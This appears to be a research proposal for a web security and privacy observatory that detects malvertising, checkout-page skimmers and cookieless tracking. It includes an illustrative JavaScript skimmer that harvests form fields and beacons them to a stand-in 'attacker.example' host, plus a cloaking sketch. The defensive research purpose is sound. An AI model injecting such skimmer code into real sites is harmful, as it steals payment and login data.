Originally conceived over three decades ago as a network of interlinked documents, the web today has evolved into a platform for a diverse array of applications. The ubiquitous presence of the web in everyday activities, ranging from social networking to online banking, has led to a new suite of challenges related to privacy, security and autonomy.
Online tracking
The issue of online tracking, which involves monitoring individuals' browsing behavior across various websites, has attracted scrutiny from researchers, policymakers, and the broader public. Investigations have found that websites revealing individuals' religious beliefs, health conditions, or political affiliations share data with third parties that engage in unconsented and surreptitious profiling. The personal and sensitive data of unsuspecting users are bought and sold by data brokers with minimal accountability and oversight.
Malvertising
Today, online tracking and advertising are going through a fundamental change with the planned phase-out of third-party cookies by the end of 2024. The proposals that will replace third-party cookies have received only limited attention from privacy and security researchers, leaving potential vulnerabilities and intrusive practices unaddressed. Moreover, advertising networks, including Google's, have repeatedly been found to distribute malicious software: a practice known as malvertising.
The lack of continuous monitoring allows these attacks and violations to remain undetected for extended periods. Even notorious ransomware groups have reportedly started using malvertising to infiltrate enterprises, running fake advertisements for software commonly used in corporate environments. Unsuspecting employees who trust Google with their searches may download a backdoored binary, which can then steal the victim's credentials or infect their employer's network in preparation for a ransomware attack.
Digital skimming
Web users are also exposed to malicious actors who steal private and financial information through digital skimming attacks. In these attacks, attackers compromise online stores, or third-party vendors integrated with those stores (a supply-chain attack), to inject information-stealing JavaScript code. When a user fills in a login or payment form on a compromised site, the malicious code captures and exfiltrates the password or credit card details, along with other personal information. In 2018, this very attack was used to steal the credit card details of 380,000 victims who used the British Airways website. Thousands of other websites have been compromised using similar methods since then.
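To make the mechanism concrete, the following is a minimal sketch of what an injected skimmer could look like; the attacker domain and parameter name are, of course, hypothetical:

```ts
// Minimal sketch of an injected web skimmer (illustrative only);
// "attacker.example" and the "d" parameter are hypothetical.
document.addEventListener('submit', (event: Event) => {
  const form = event.target as HTMLFormElement;
  const stolen: Record<string, string> = {};
  // Harvest every named field the victim filled in (card number, CVV, ...).
  for (const element of Array.from(form.elements)) {
    const input = element as HTMLInputElement;
    if (input.name && input.value) {
      stolen[input.name] = input.value;
    }
  }
  // Exfiltrate via an image beacon, a common low-profile channel in
  // real-world skimming campaigns.
  new Image().src =
    'https://attacker.example/collect?d=' +
    encodeURIComponent(btoa(JSON.stringify(stolen)));
}, true); // capture phase: runs even if the site stops event propagation
```

Real-world skimmers are typically obfuscated and often activate only on payment pages to avoid detection.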
Research goals
Empirical research on web privacy and security relies on large-scale crawls to detect intrusive tracking mechanisms and web-based security threats. Uncovering such threats helps address vulnerabilities, prevent further exploitation, raise public awareness, and inform policy-making. However, detecting web-based security threats at scale is challenging: it requires realistic user simulation, dynamic analysis, and deep instrumentation that can cope with obfuscated and evasive JavaScript code. The goal of this project is to contribute tools, methods and data to help address these challenges by harnessing recent advances in machine learning and browser automation.
The primary goal of WeSPO is to contribute tools, methods and datasets for detecting privacy and security threats stemming from malvertising, digital skimming attacks and novel forms of online tracking.
Scientific and technical challenges
Malicious actors use evasive cloaking methods, including commercial anti-bot products and client-side browser fingerprinting, to evade detection by security scanners. JavaScript, the programming language of the web, is notoriously difficult to analyze due to code obfuscation and language features such as dynamic code generation, closures and dynamic typing. Moreover, websites are constantly updated, personalized, and localized, making it difficult to reproduce results from prior studies even when the detailed methods and code are made available. State-of-the-art forensics-focused projects such as WebRR have only recently made it possible to record and replay web-based attacks, but their overhead remains prohibitive for large-scale measurements and they do not provide complete determinism. Maintaining such projects is also a significant challenge, since they require modifications to the browser's JavaScript engine that may break with browser updates.
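As a toy illustration of why static analysis alone falls short, consider the following simplified pattern, which combines fingerprint-based cloaking with dynamic code generation; the payload is a harmless placeholder, and real campaigns use far more elaborate environment checks:

```ts
// Simplified sketch of client-side cloaking plus dynamic code generation.
// The base64 string decodes to "console.log('payload');" (a placeholder).
const encodedPayload = 'Y29uc29sZS5sb2coJ3BheWxvYWQnKTs=';

// Fingerprint the environment: headless browsers and crawlers often
// expose navigator.webdriver or report no plugins.
const looksAutomated =
  navigator.webdriver === true || navigator.plugins.length === 0;

if (!looksAutomated) {
  // The payload only exists as an opaque string until this point, so a
  // static analyzer never sees the decoded program.
  new Function(atob(encodedPayload))();
}
```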
Realistic simulation of user interactions also poses several challenges: for instance, to analyze a website's checkout form, the crawler must perform a series of interactions in a specific order. These tasks are easy for a human, but difficult for the automated software required for large-scale studies; the sketch below illustrates the kind of interaction sequence involved.
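For concreteness, an ordered interaction sequence of this kind could look as follows in Playwright; the URL, roles and labels are hypothetical examples, and real sites vary widely:

```ts
import { chromium } from 'playwright';

// Sketch of the ordered interactions needed to reach a checkout form.
// The shop URL and the button/label names are hypothetical examples.
async function reachCheckout(): Promise<void> {
  const browser = await chromium.launch();
  const page = await browser.newPage();
  await page.goto('https://shop.example/product/123');

  // Each step depends on the previous one having succeeded.
  await page.getByRole('button', { name: /add to (cart|basket)/i }).click();
  await page.getByRole('link', { name: /checkout/i }).click();
  await page.getByLabel(/email/i).fill('crawler@example.com');
  await page.getByLabel(/card number/i).fill('4111 1111 1111 1111');

  await browser.close();
}

reachCheckout().catch(console.error);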
Finally, the sheer scale of the advertisements displayed every day poses another challenge for detecting malvertising campaigns. Analyzing every ad is infeasible, so efficient detection requires careful prioritization and sampling of the ads to be analyzed. Overall, WeSPO will follow a pragmatic and targeted approach to tackle these challenges, which we describe below.
Key objectives
Key objective 1: Efficient and early detection of malvertising campaigns
A key objective of the study is to continuously detect and report malvertising campaigns. Detecting such campaigns poses two main challenges: evasive cloaking by malvertisers and the sheer scale of advertisements in circulation. A key idea to tackle both challenges at once is to use the platforms' ad libraries, minimizing contact with the malvertiser's online properties. Thanks to regulations such as the EU Digital Services Act, large tech platforms such as Google and Facebook are required to publish the advertisements they distribute. These extensive datasets are accessible through APIs, offering a rich resource for analysis. For instance, Google's dataset reveals that approximately 343,000 ads from 46,000 unique advertisers are launched daily within the European Economic Area (EEA) and Turkey alone, the two regions covered by Google's disclosures. Narrowing the focus to three relevant ad categories (Software, Computers & Consumer Electronics, and Mobile App Utilities) reduces the number of new daily ads to around 20,000 (median). This manageable subset will be further refined by prioritizing ads from lesser-known advertisers, considering both the number of impressions and the number of distinct ads. Since some malvertising campaigns have used hijacked advertiser accounts, the strategy will also include sampling advertisements from all advertisers in the pertinent ad categories, as sketched below.
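The following sketch illustrates the intended prioritization step, assuming ad metadata has already been retrieved from a platform transparency API; the record schema and the scoring heuristic are illustrative assumptions, not the actual API format:

```ts
// Sketch of the prioritization step. The AdRecord fields are assumptions
// about what a transparency API might expose, not the real schema.
interface AdRecord {
  advertiserId: string;
  category: string;    // e.g. "Software"
  impressions: number; // reported impression count
}

const RELEVANT_CATEGORIES = new Set([
  'Software',
  'Computers & Consumer Electronics',
  'Mobile App Utilities',
]);

function prioritizeAds(ads: AdRecord[], budget: number): AdRecord[] {
  // Count distinct ads per advertiser as a rough proxy for how
  // established the advertiser is.
  const adsPerAdvertiser = new Map<string, number>();
  for (const ad of ads) {
    adsPerAdvertiser.set(
      ad.advertiserId,
      (adsPerAdvertiser.get(ad.advertiserId) ?? 0) + 1,
    );
  }
  return ads
    .filter((ad) => RELEVANT_CATEGORIES.has(ad.category))
    // Crude score: lesser-known advertisers (few impressions, few
    // distinct ads) come first.
    .sort((a, b) =>
      (a.impressions + (adsPerAdvertiser.get(a.advertiserId) ?? 0)) -
      (b.impressions + (adsPerAdvertiser.get(b.advertiserId) ?? 0)))
    .slice(0, budget);
  // In practice, a small uniform random sample across all advertisers
  // would complement this, since campaigns may run from hijacked,
  // well-established accounts.
}
```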
Key objective 2: Detect digital skimming attacks with a focus on e-commerce websites
This key objective is dedicated to developing a tool for identifying digital skimming attacks, which have historically affected thousands of e-commerce sites by stealing credit card and personal data. We will focus on e-commerce websites and the login forms of the top 100K websites. To efficiently identify web skimmer scripts, we will deploy an interactive crawler that mimics the actions of a user completing a purchase. This process is challenging due to the diversity of website designs and purchase flows.
We will train lightweight ML models to detect common elements such as add-to-cart and checkout buttons. Recent multimodal models such as GPT-4 Vision are already used in open-source projects to build ML-guided crawlers. These tools work by submitting the page screenshot and a simplified DOM tree to the model, while prompting it with the task at hand (e.g., "What button should I click next to book a plane ticket from X to Y?"). Unfortunately, these models are costly and energy-intensive. In Senol et al., the PI successfully used lightweight pre-trained Mozilla Fathom models to identify 76% more email fields than matching on input field types alone. The PI's PhD student Senol then collaborated with Google researchers to build highly accurate classifiers that detect login pages. Unlike this prior work, we will focus on underutilized accessibility labels in combination with distilled (i.e., lightweight) multilingual language models such as MiniLM, as sketched below. To gather training data for these models, we will employ Playwright's codegen feature, which records accessibility selectors and user interactions during a manual website visit.
A side objective will be to evaluate and improve the pre-trained models used in Firefox and other mainstream browsers to detect password fields, credit card forms and other autofill elements. To this end, we will seek collaboration with Mozilla developers, who have already supported the applicant by giving access to private models that are still in development.
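A minimal sketch of this idea follows, assuming embeddings from a distilled MiniLM-style sentence encoder (here via the community @xenova/transformers package); the model name, prototype phrases and threshold are illustrative choices, and a multilingual MiniLM variant would be used in practice:

```ts
import { pipeline } from '@xenova/transformers';

// Sketch: classify interactive elements by comparing their accessibility
// names against prototype phrases with a distilled sentence encoder.
const embed = await pipeline('feature-extraction', 'Xenova/all-MiniLM-L6-v2');

// Prototype phrases for the target element class (illustrative).
const PROTOTYPES = ['add to cart', 'proceed to checkout', 'place order'];

async function embedText(text: string): Promise<number[]> {
  const output: any = await embed(text, { pooling: 'mean', normalize: true });
  return Array.from(output.data);
}

function cosine(a: number[], b: number[]): number {
  // Vectors are L2-normalized above, so the dot product is the cosine.
  return a.reduce((sum, value, i) => sum + value * b[i], 0);
}

async function looksLikeCheckoutButton(accessibleName: string): Promise<boolean> {
  const nameVector = await embedText(accessibleName);
  for (const prototype of PROTOTYPES) {
    // Threshold of 0.8 is an assumption to be tuned on labeled data.
    if (cosine(nameVector, await embedText(prototype)) > 0.8) return true;
  }
  return false;
}
```

In the crawler, the accessible name of each candidate element would be extracted from the page (e.g., through Playwright's role-based locators) before being passed to such a classifier.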
Key objective 3: Set up a Web Security and Privacy Observatory (WeSPO)
Web archives and crawl datasets such as the Wayback Machine, CommonCrawl and the HTTP Archive have crucial limitations for web measurement research. These limitations include passive crawling (i.e., no interaction with the page), incomplete third-party coverage, and Wayback escapes, i.e., the loading of unarchived content from live websites. Further, these archives and datasets are based on crawls from the US or from unknown locations.
To address this data gap, the project will establish a Web Security and Privacy Observatory (WeSPO) that conducts quarterly web privacy measurement crawls of the top 100,000 websites from the CrUX list. Unlike key objectives 1 and 2, WeSPO crawls will focus on the evolving landscape of tracking mechanisms following the impending phase-out of third-party cookies. In addition to well-known cookieless tracking mechanisms such as browser fingerprinting, the crawls will examine potential misuse of the Topics and Protected Audience APIs, two Privacy Sandbox APIs for interest-based and retargeted advertising that are poised to replace third-party cookies. Potential misuses include sharing users' topics (interests) between origins, and adding users to interest groups that act as opaque proxy variables for sensitive traits.
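A minimal sketch of how such crawls could instrument these APIs follows, assuming a Chromium build with the Topics and Protected Audience features enabled; the binding name and logged fields are illustrative assumptions:

```ts
import { chromium } from 'playwright';

// Sketch: wrap the Privacy Sandbox entry points before any page script
// runs, so every call (caller origin, arguments, results) can be logged.
async function instrumentPrivacySandbox(): Promise<void> {
  const browser = await chromium.launch();
  const context = await browser.newContext();

  // Expose a logging function to all pages; a real crawler would persist
  // these records to its measurement database.
  await context.exposeBinding('reportSandboxCall', (_source, record) => {
    console.log(JSON.stringify(record));
  });

  await context.addInitScript(() => {
    const doc = Document.prototype as any;
    if (doc.browsingTopics) {
      const original = doc.browsingTopics;
      doc.browsingTopics = async function (...args: any[]) {
        const topics = await original.apply(this, args);
        (window as any).reportSandboxCall(
          { api: 'browsingTopics', origin: location.origin, topics });
        return topics;
      };
    }
    const nav = Navigator.prototype as any;
    if (nav.joinAdInterestGroup) {
      const original = nav.joinAdInterestGroup;
      nav.joinAdInterestGroup = function (group: any, ...rest: any[]) {
        (window as any).reportSandboxCall(
          { api: 'joinAdInterestGroup', origin: location.origin,
            owner: group?.owner, name: group?.name });
        return original.call(this, group, ...rest);
      };
    }
  });

  const page = await context.newPage();
  await page.goto('https://example.com');
  await browser.close();
}

instrumentPrivacySandbox().catch(console.error);
```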